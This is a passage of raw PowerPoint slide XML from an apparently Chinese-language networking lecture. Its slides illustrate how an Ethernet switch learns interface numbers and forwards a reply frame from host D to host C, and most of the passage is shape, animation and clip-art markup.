          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7197725" y="2351088"/>
            <a:ext cx="420688"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E</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G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15409" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7777163" y="2349500"/>
            <a:ext cx="33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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15410" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3527425" y="22479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5411" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3848100" y="2532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5412" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4273550" y="24923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15413" name="Rectangle 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6534150" y="1911350"/>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409657" name="Line 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2424113" y="2395538"/>
            <a:ext cx="1365250" cy="85566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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1670050" y="3395663"/>
            <a:ext cx="463550" cy="449262"/>
            <a:chOff x="1052" y="2139"/>
            <a:chExt cx="292" cy="283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15430" name="Line 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1052" y="2139"/>
              <a:ext cx="283"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31" name="Line 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1134" y="2248"/>
              <a:ext cx="210" cy="174"/>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9661" name="Line 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2500313" y="3495675"/>
            <a:ext cx="82550" cy="30638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62" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4456113" y="2036763"/>
            <a:ext cx="2046287" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3471863" y="3409950"/>
            <a:ext cx="1001712" cy="595313"/>
            <a:chOff x="2187" y="2148"/>
            <a:chExt cx="631" cy="375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15427" name="Line 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2187" y="2148"/>
              <a:ext cx="236" cy="147"/>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8" name="Line 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2397" y="2285"/>
              <a:ext cx="72" cy="2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9" name="Line 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2698" y="2194"/>
              <a:ext cx="120" cy="19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09667" name="Text Box 67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7199313" y="3903663"/>
            <a:ext cx="973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C     1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4005263" y="2335213"/>
            <a:ext cx="1687512" cy="973137"/>
            <a:chOff x="2523" y="1471"/>
            <a:chExt cx="1063" cy="613"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15425" name="Line 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2523" y="1545"/>
              <a:ext cx="1" cy="531"/>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6" name="Line 70"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2825" y="1471"/>
              <a:ext cx="761" cy="613"/>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71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5300663" y="3497263"/>
            <a:ext cx="1089025" cy="523875"/>
            <a:chOff x="3339" y="2203"/>
            <a:chExt cx="686" cy="330"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15422" name="Line 72"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3339" y="2203"/>
              <a:ext cx="236" cy="147"/>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3" name="Line 73"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3604" y="2295"/>
              <a:ext cx="17" cy="2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4" name="Line 74"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3777" y="2249"/>
              <a:ext cx="248" cy="1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661"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4096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57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4096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62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40966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09604">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40960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09604">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09604">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="409604">
                                            <p:txEl>
                                              <p:pRg st="1" end="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09604">
                                            <p:txEl>
                                              <p:pRg st="1" end="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09604">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="409604">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096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409604">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="409604">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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0960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7" grpId="0" animBg="1"/>
      <p:bldP spid="409661" grpId="0" animBg="1"/>
      <p:bldP spid="409662" grpId="0" animBg="1"/>
      <p:bldP spid="409667"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9"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7420"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9F400D2D-B71A-4601-A6B4-2FAD3B61EB7E}"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6397" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>交换机举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16398" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550863" y="1139825"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>回复数据帧给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>C. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411652" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="4664075"/>
            <a:ext cx="77724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交换机接收来自</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的数据帧</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记录</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所对应的接口号为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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因为</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在交换表中，并且接口为</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，则交换机只向接口</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转发数据帧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>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数据帧被</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接收</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16400"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6038" y="33401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6" name="Object 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1692275" y="3789363"/>
          <a:ext cx="409575" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639455" name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6394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8936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7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4259263" y="3800475"/>
          <a:ext cx="409575" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639456" name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63945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3" y="3800475"/>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8" name="Object 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5032375" y="3759200"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639457" name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63945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37592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9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1247775" y="3311525"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639458" name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63945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7775" y="331152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401"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3875" y="33480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4238" y="3338513"/>
            <a:ext cx="457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12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3213100" y="3662363"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639459" name="Clip" r:id="rId12" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63945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3100" y="366236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13"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3627438" y="4094163"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639460" name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63945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4094163"/>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14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6418263" y="3633788"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639461" name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63946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8263" y="36337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15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5702300" y="3967163"/>
          <a:ext cx="407988" cy="320675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639462" name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63946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300" y="3967163"/>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4" name="Object 16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2263775" y="3825875"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s639463" name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63946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63775" y="382587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3" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1633538" y="3503613"/>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4" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2000250" y="3546475"/>
            <a:ext cx="258763" cy="284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5" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2398713" y="3573463"/>
            <a:ext cx="68262" cy="265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6" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="3538538"/>
            <a:ext cx="328613" cy="195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7" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3878263" y="3556000"/>
            <a:ext cx="120650" cy="528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8" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4168775" y="3503613"/>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9" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5381625" y="3573463"/>
            <a:ext cx="406400"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0" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5857875" y="3546475"/>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1" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="3476625"/>
            <a:ext cx="487362"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6412" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3905250" y="2176463"/>
            <a:ext cx="509588" cy="252412"/>
            <a:chOff x="2460" y="1371"/>
            <a:chExt cx="321" cy="159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16452" name="Line 27"/>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6453" name="Picture 28"/>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54" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2576" y="1407"/>
              <a:ext cx="84" cy="62"/>
              <a:chOff x="2576" y="1407"/>
              <a:chExt cx="84" cy="62"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16455" name="Line 30"/>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56" name="Line 31"/>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6413" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2389188" y="2409825"/>
            <a:ext cx="1581150" cy="9699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4" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4117975" y="2401888"/>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5" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4265613" y="2357438"/>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6" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
